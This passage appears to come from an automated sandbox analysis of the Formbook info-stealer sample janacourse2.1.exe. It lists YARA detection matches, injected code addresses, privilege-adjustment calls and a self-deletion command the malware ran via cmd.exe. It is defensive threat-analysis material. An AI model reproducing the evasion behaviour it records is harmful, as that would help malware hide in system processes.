          Source: C:\Windows\SysWOW64\explorer.exeCode function: 3_2_04B08DBF3_2_04B08DBF
          Source: C:\Windows\SysWOW64\explorer.exeCode function: 3_2_04AEADE03_2_04AEADE0
          Source: C:\Windows\SysWOW64\explorer.exeCode function: 3_2_04B8CD1F3_2_04B8CD1F
          Source: C:\Windows\SysWOW64\explorer.exeCode function: 3_2_04AFAD003_2_04AFAD00
          Source: C:\Windows\SysWOW64\explorer.exeCode function: 3_2_04B02E903_2_04B02E90
          Source: C:\Windows\SysWOW64\explorer.exeCode function: 3_2_04BACE933_2_04BACE93
          Source: C:\Windows\SysWOW64\explorer.exeCode function: 3_2_04BAEEDB3_2_04BAEEDB
          Source: C:\Windows\SysWOW64\explorer.exeCode function: 3_2_04BAEE263_2_04BAEE26
          Source: C:\Windows\SysWOW64\explorer.exeCode function: 3_2_04AF0E593_2_04AF0E59
          Source: C:\Windows\SysWOW64\explorer.exeCode function: 3_2_04B6EFA03_2_04B6EFA0
          Source: C:\Windows\SysWOW64\explorer.exeCode function: 3_2_04AE2FC83_2_04AE2FC8
          Source: C:\Windows\SysWOW64\explorer.exeCode function: 3_2_04B10F303_2_04B10F30
          Source: C:\Windows\SysWOW64\explorer.exeCode function: 3_2_04B92F303_2_04B92F30
          Source: C:\Windows\SysWOW64\explorer.exeCode function: 3_2_04B32F283_2_04B32F28
          Source: C:\Windows\SysWOW64\explorer.exeCode function: 3_2_04B64F403_2_04B64F40
          Source: C:\Windows\SysWOW64\explorer.exeCode function: 3_2_04AD68B83_2_04AD68B8
          Source: C:\Windows\SysWOW64\explorer.exeCode function: 3_2_04B1E8F03_2_04B1E8F0
          Source: C:\Windows\SysWOW64\explorer.exeCode function: 3_2_04AF28403_2_04AF2840
          Source: C:\Windows\SysWOW64\explorer.exeCode function: 3_2_04AFA8403_2_04AFA840
          Source: C:\Windows\SysWOW64\explorer.exeCode function: 3_2_04AF29A03_2_04AF29A0
          Source: C:\Windows\SysWOW64\explorer.exeCode function: 3_2_04BBA9A63_2_04BBA9A6
          Source: C:\Windows\SysWOW64\explorer.exeCode function: 3_2_04B069623_2_04B06962
          Source: C:\Windows\SysWOW64\explorer.exeCode function: 3_2_04AEEA803_2_04AEEA80
          Source: C:\Windows\SysWOW64\explorer.exeCode function: 3_2_04BA6BD73_2_04BA6BD7
          Source: C:\Windows\SysWOW64\explorer.exeCode function: 3_2_04BAAB403_2_04BAAB40
          Source: C:\Windows\SysWOW64\explorer.exeCode function: 3_2_04BAF43F3_2_04BAF43F
          Source: C:\Windows\SysWOW64\explorer.exeCode function: 3_2_04AE14603_2_04AE1460
          Source: C:\Windows\SysWOW64\explorer.exeCode function: 3_2_04B8D5B03_2_04B8D5B0
          Source: C:\Windows\SysWOW64\explorer.exeCode function: 3_2_04BB95C33_2_04BB95C3
          Source: C:\Windows\SysWOW64\explorer.exeCode function: 3_2_04BA75713_2_04BA7571
          Source: C:\Windows\SysWOW64\explorer.exeCode function: 3_2_04BA16CC3_2_04BA16CC
          Source: C:\Windows\SysWOW64\explorer.exeCode function: 3_2_04B356303_2_04B35630
          Source: C:\Windows\SysWOW64\explorer.exeCode function: 3_2_04BAF7B03_2_04BAF7B0
          Source: C:\Windows\SysWOW64\explorer.exeCode function: 3_2_04BA70E93_2_04BA70E9
          Source: C:\Windows\SysWOW64\explorer.exeCode function: 3_2_04BAF0E03_2_04BAF0E0
          Source: C:\Windows\SysWOW64\explorer.exeCode function: 3_2_04AF70C03_2_04AF70C0
          Source: C:\Windows\SysWOW64\explorer.exeCode function: 3_2_04B9F0CC3_2_04B9F0CC
          Source: C:\Windows\SysWOW64\explorer.exeCode function: 3_2_04AFB1B03_2_04AFB1B0
          Source: C:\Windows\SysWOW64\explorer.exeCode function: 3_2_04BBB16B3_2_04BBB16B
          Source: C:\Windows\SysWOW64\explorer.exeCode function: 3_2_04B2516C3_2_04B2516C
          Source: C:\Windows\SysWOW64\explorer.exeCode function: 3_2_04ADF1723_2_04ADF172
          Source: C:\Windows\SysWOW64\explorer.exeCode function: 3_2_04AF52A03_2_04AF52A0
          Source: C:\Windows\SysWOW64\explorer.exeCode function: 3_2_04B0D2F03_2_04B0D2F0
          Source: C:\Windows\SysWOW64\explorer.exeCode function: 3_2_04B912ED3_2_04B912ED
          Source: C:\Windows\SysWOW64\explorer.exeCode function: 3_2_04B0B2C03_2_04B0B2C0
          Source: C:\Windows\SysWOW64\explorer.exeCode function: 3_2_04B3739A3_2_04B3739A
          Source: C:\Windows\SysWOW64\explorer.exeCode function: 3_2_04BA132D3_2_04BA132D
          Source: C:\Windows\SysWOW64\explorer.exeCode function: 3_2_04ADD34C3_2_04ADD34C
          Source: C:\Windows\SysWOW64\explorer.exeCode function: 3_2_04BAFCF23_2_04BAFCF2
          Source: C:\Windows\SysWOW64\explorer.exeCode function: 3_2_04B69C323_2_04B69C32
          Source: C:\Windows\SysWOW64\explorer.exeCode function: 3_2_04B0FDC03_2_04B0FDC0
          Source: C:\Windows\SysWOW64\explorer.exeCode function: 3_2_04BA7D733_2_04BA7D73
          Source: C:\Windows\SysWOW64\explorer.exeCode function: 3_2_04BA1D5A3_2_04BA1D5A
          Source: C:\Windows\SysWOW64\explorer.exeCode function: 3_2_04AF3D403_2_04AF3D40
          Source: C:\Windows\SysWOW64\explorer.exeCode function: 3_2_04AF9EB03_2_04AF9EB0
          Source: C:\Windows\SysWOW64\explorer.exeCode function: 3_2_04BAFFB13_2_04BAFFB1
          Source: C:\Windows\SysWOW64\explorer.exeCode function: 3_2_04AF1F923_2_04AF1F92
          Source: C:\Windows\SysWOW64\explorer.exeCode function: 3_2_04AB3FD23_2_04AB3FD2
          Source: C:\Windows\SysWOW64\explorer.exeCode function: 3_2_04AB3FD53_2_04AB3FD5
          Source: C:\Windows\SysWOW64\explorer.exeCode function: 3_2_04BAFF093_2_04BAFF09
          Source: C:\Windows\SysWOW64\explorer.exeCode function: 3_2_04AF38E03_2_04AF38E0
          Source: C:\Windows\SysWOW64\explorer.exeCode function: 3_2_04B5D8003_2_04B5D800
          Source: C:\Windows\SysWOW64\explorer.exeCode function: 3_2_04B859103_2_04B85910
          Source: C:\Windows\SysWOW64\explorer.exeCode function: 3_2_04B0B9503_2_04B0B950
          Source: C:\Windows\SysWOW64\explorer.exeCode function: 3_2_04AF99503_2_04AF9950
          Source: C:\Windows\SysWOW64\explorer.exeCode function: 3_2_04B35AA03_2_04B35AA0
          Source: C:\Windows\SysWOW64\explorer.exeCode function: 3_2_04B8DAAC3_2_04B8DAAC
          Source: C:\Windows\SysWOW64\explorer.exeCode function: 3_2_04B91AA33_2_04B91AA3
          Source: C:\Windows\SysWOW64\explorer.exeCode function: 3_2_04B9DAC63_2_04B9DAC6
          Source: C:\Windows\SysWOW64\explorer.exeCode function: 3_2_04B63A6C3_2_04B63A6C
          Source: C:\Windows\SysWOW64\explorer.exeCode function: 3_2_04BAFA493_2_04BAFA49
          Source: C:\Windows\SysWOW64\explorer.exeCode function: 3_2_04BA7A463_2_04BA7A46
          Source: C:\Windows\SysWOW64\explorer.exeCode function: 3_2_04B0FB803_2_04B0FB80
          Source: C:\Windows\SysWOW64\explorer.exeCode function: 3_2_04B65BF03_2_04B65BF0
          Source: C:\Windows\SysWOW64\explorer.exeCode function: 3_2_04B2DBF93_2_04B2DBF9
          Source: C:\Windows\SysWOW64\explorer.exeCode function: 3_2_04BAFB763_2_04BAFB76
          Source: C:\Windows\SysWOW64\explorer.exeCode function: 3_2_029EE7A43_2_029EE7A4
          Source: C:\Windows\SysWOW64\explorer.exeCode function: 3_2_029D9E5C3_2_029D9E5C
          Source: C:\Windows\SysWOW64\explorer.exeCode function: 3_2_029D9E603_2_029D9E60
          Source: C:\Windows\SysWOW64\explorer.exeCode function: 3_2_029D2FB03_2_029D2FB0
          Source: C:\Windows\SysWOW64\explorer.exeCode function: 3_2_029D2D903_2_029D2D90
          Source: C:\Windows\SysWOW64\explorer.exeCode function: 3_2_029D2D873_2_029D2D87
          Source: C:\Windows\SysWOW64\explorer.exeCode function: 3_2_0499A0363_2_0499A036
          Source: C:\Windows\SysWOW64\explorer.exeCode function: 3_2_0499E5CD3_2_0499E5CD
          Source: C:\Windows\SysWOW64\explorer.exeCode function: 3_2_04992D023_2_04992D02
          Source: C:\Windows\SysWOW64\explorer.exeCode function: 3_2_049910823_2_04991082
          Source: C:\Windows\SysWOW64\explorer.exeCode function: 3_2_049989123_2_04998912
          Source: C:\Windows\SysWOW64\explorer.exeCode function: 3_2_0499B2323_2_0499B232
          Source: C:\Windows\SysWOW64\explorer.exeCode function: 3_2_04995B303_2_04995B30
          Source: C:\Windows\SysWOW64\explorer.exeCode function: 3_2_04995B323_2_04995B32
          Source: C:\Users\user\Desktop\janacourse2.1.exeCode function: String function: 00FCF9F2 appears 31 times
          Source: C:\Users\user\Desktop\janacourse2.1.exeCode function: String function: 00FD0A30 appears 46 times
          Source: C:\Windows\SysWOW64\explorer.exeCode function: String function: 04ADB970 appears 262 times
          Source: C:\Windows\SysWOW64\explorer.exeCode function: String function: 04B37E54 appears 107 times
          Source: C:\Windows\SysWOW64\explorer.exeCode function: String function: 04B6F290 appears 103 times
          Source: C:\Windows\SysWOW64\explorer.exeCode function: String function: 04B25130 appears 58 times
          Source: C:\Windows\SysWOW64\explorer.exeCode function: String function: 04B5EA12 appears 86 times
          Source: C:\Windows\SysWOW64\svchost.exeCode function: String function: 034AEA12 appears 86 times
          Source: C:\Windows\SysWOW64\svchost.exeCode function: String function: 0342B970 appears 262 times
          Source: C:\Windows\SysWOW64\svchost.exeCode function: String function: 03475130 appears 58 times
          Source: C:\Windows\SysWOW64\svchost.exeCode function: String function: 03487E54 appears 107 times
          Source: C:\Windows\SysWOW64\svchost.exeCode function: String function: 034BF290 appears 103 times
Source: janacourse2.1.exe, 00000000.00000003.1649753787.0000000003FBD000.00000004.00001000.00020000.00000000.sdmp | Binary or memory string: OriginalFilenamentdll.dllj% vs janacourse2.1.exe
Source: janacourse2.1.exe, 00000000.00000003.1650634228.0000000003E13000.00000004.00001000.00020000.00000000.sdmp | Binary or memory string: OriginalFilenamentdll.dllj% vs janacourse2.1.exe
Source: janacourse2.1.exe | Static PE information: EXECUTABLE_IMAGE, LARGE_ADDRESS_AWARE, 32BIT_MACHINE
Source: 1.2.svchost.exe.400000.0.unpack, type: UNPACKEDPE | Matched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
Source: 1.2.svchost.exe.400000.0.unpack, type: UNPACKEDPE | Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
Source: 1.2.svchost.exe.400000.0.unpack, type: UNPACKEDPE | Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
Source: 0.2.janacourse2.1.exe.1df0000.1.raw.unpack, type: UNPACKEDPE | Matched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
Source: 0.2.janacourse2.1.exe.1df0000.1.raw.unpack, type: UNPACKEDPE | Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
Source: 0.2.janacourse2.1.exe.1df0000.1.raw.unpack, type: UNPACKEDPE | Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
Source: 1.2.svchost.exe.400000.0.raw.unpack, type: UNPACKEDPE | Matched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
Source: 1.2.svchost.exe.400000.0.raw.unpack, type: UNPACKEDPE | Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
Source: 1.2.svchost.exe.400000.0.raw.unpack, type: UNPACKEDPE | Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
Source: 0.2.janacourse2.1.exe.1df0000.1.unpack, type: UNPACKEDPE | Matched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
Source: 0.2.janacourse2.1.exe.1df0000.1.unpack, type: UNPACKEDPE | Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
Source: 0.2.janacourse2.1.exe.1df0000.1.unpack, type: UNPACKEDPE | Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
Source: 00000001.00000002.1707516393.0000000000400000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY | Matched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
Source: 00000001.00000002.1707516393.0000000000400000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY | Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
Source: 00000001.00000002.1707516393.0000000000400000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY | Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
Source: 00000003.00000002.2894349605.0000000004840000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY | Matched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
Source: 00000003.00000002.2894349605.0000000004840000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY | Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
Source: 00000003.00000002.2894349605.0000000004840000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY | Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
Source: 00000001.00000002.1707952623.0000000003240000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY | Matched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
Source: 00000001.00000002.1707952623.0000000003240000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY | Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
Source: 00000001.00000002.1707952623.0000000003240000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY | Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
Source: 00000000.00000002.1653240375.0000000001DF0000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY | Matched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
Source: 00000000.00000002.1653240375.0000000001DF0000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY | Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
Source: 00000000.00000002.1653240375.0000000001DF0000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY | Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
Source: 00000001.00000002.1707975652.0000000003270000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY | Matched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
Source: 00000001.00000002.1707975652.0000000003270000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY | Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
Source: 00000001.00000002.1707975652.0000000003270000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY | Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
Source: 00000003.00000002.2894297135.0000000004810000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY | Matched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
Source: 00000003.00000002.2894297135.0000000004810000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY | Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
Source: 00000003.00000002.2894297135.0000000004810000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY | Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
Source: 00000003.00000002.2893815730.00000000029D0000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY | Matched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
Source: 00000003.00000002.2893815730.00000000029D0000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY | Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
Source: 00000003.00000002.2893815730.00000000029D0000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY | Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
Source: Process Memory Space: janacourse2.1.exe PID: 7340, type: MEMORYSTR | Matched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
Source: Process Memory Space: svchost.exe PID: 7356, type: MEMORYSTR | Matched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
Source: Process Memory Space: explorer.exe PID: 7428, type: MEMORYSTR | Matched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
Source: classification engine | Classification label: mal100.troj.evad.winEXE@8/1@8/2
Source: C:\Users\user\Desktop\janacourse2.1.exe | Code function: 0_2_010237B5 GetLastError,FormatMessageW
Source: C:\Users\user\Desktop\janacourse2.1.exe | Code function: 0_2_010110BF AdjustTokenPrivileges,CloseHandle
Source: C:\Users\user\Desktop\janacourse2.1.exe | Code function: 0_2_010116C3 LookupPrivilegeValueW,AdjustTokenPrivileges,GetLastError
Source: C:\Users\user\Desktop\janacourse2.1.exe | Code function: 0_2_010251CD SetErrorMode,GetDiskFreeSpaceExW,SetErrorMode
Source: C:\Users\user\Desktop\janacourse2.1.exe | Code function: 0_2_0103A67C CreateToolhelp32Snapshot,Process32FirstW,Process32NextW,CloseHandle
Source: C:\Users\user\Desktop\janacourse2.1.exe | Code function: 0_2_0102648E _wcslen,CoInitialize,CoCreateInstance,CoUninitialize
Source: C:\Users\user\Desktop\janacourse2.1.exe | Code function: 0_2_00FB42A2 CreateStreamOnHGlobal,FindResourceExW,LoadResource,SizeofResource,LockResource
Source: C:\Windows\System32\conhost.exe | Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:7464:120:WilError_03
Source: C:\Users\user\Desktop\janacourse2.1.exe | File created: C:\Users\user\AppData\Local\Temp\leucoryx
Source: C:\Windows\explorer.exe | Process created: C:\Windows\SysWOW64\explorer.exe
          Source: janacourse2.1.exe Static PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
          Source: C:\Windows\explorer.exe File read: C:\Users\desktop.ini
          Source: C:\Users\user\Desktop\janacourse2.1.exe Key opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers
          Source: janacourse2.1.exe Virustotal: Detection: 31%
          Source: explorer.exe String found in binary or memory: /LOADSAVEDWINDOWS
          Source: explorer.exe String found in binary or memory: accent-startColor
          Source: explorer.exe String found in binary or memory: accent-startColorMenu
          Source: explorer.exe String found in binary or memory: themes-installTheme
          Source: explorer.exe String found in binary or memory: Microsoft-Windows-Shell-Launcher
          Source: explorer.exe String found in binary or memory: api-ms-win-stateseparation-helpers-l1-1-0.dll
          Source: unknown Process created: C:\Users\user\Desktop\janacourse2.1.exe "C:\Users\user\Desktop\janacourse2.1.exe"
          Source: C:\Users\user\Desktop\janacourse2.1.exe Process created: C:\Windows\SysWOW64\svchost.exe "C:\Users\user\Desktop\janacourse2.1.exe"
          Source: C:\Windows\explorer.exe Process created: C:\Windows\SysWOW64\explorer.exe "C:\Windows\SysWOW64\explorer.exe"
          Source: C:\Windows\SysWOW64\explorer.exe Process created: C:\Windows\SysWOW64\cmd.exe /c del "C:\Windows\SysWOW64\svchost.exe"
          Source: C:\Windows\SysWOW64\cmd.exe Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
          Source: C:\Users\user\Desktop\janacourse2.1.exe Section loaded: wsock32.dll
          Source: C:\Users\user\Desktop\janacourse2.1.exe Section loaded: version.dll
          Source: C:\Users\user\Desktop\janacourse2.1.exe Section loaded: winmm.dll
          Source: C:\Users\user\Desktop\janacourse2.1.exe Section loaded: mpr.dll
          Source: C:\Users\user\Desktop\janacourse2.1.exe Section loaded: wininet.dll
          Source: C:\Users\user\Desktop\janacourse2.1.exe Section loaded: iphlpapi.dll
          Source: C:\Users\user\Desktop\janacourse2.1.exe Section loaded: userenv.dll
          Source: C:\Users\user\Desktop\janacourse2.1.exe Section loaded: uxtheme.dll
          Source: C:\Users\user\Desktop\janacourse2.1.exe Section loaded: kernel.appcore.dll
          Source: C:\Users\user\Desktop\janacourse2.1.exe Section loaded: windows.storage.dll
          Source: C:\Users\user\Desktop\janacourse2.1.exe Section loaded: wldp.dll
          Source: C:\Windows\explorer.exe Section loaded: mfsrcsnk.dll
          Source: C:\Windows\explorer.exe Section loaded: vcruntime140_1.dll
          Source: C:\Windows\explorer.exe Section loaded: vcruntime140.dll
          Source: C:\Windows\explorer.exe Section loaded: msvcp140.dll
          Source: C:\Windows\SysWOW64\explorer.exe Section loaded: aepic.dll
          Source: C:\Windows\SysWOW64\explorer.exe Section loaded: twinapi.dll
          Source: C:\Windows\SysWOW64\explorer.exe Section loaded: userenv.dll
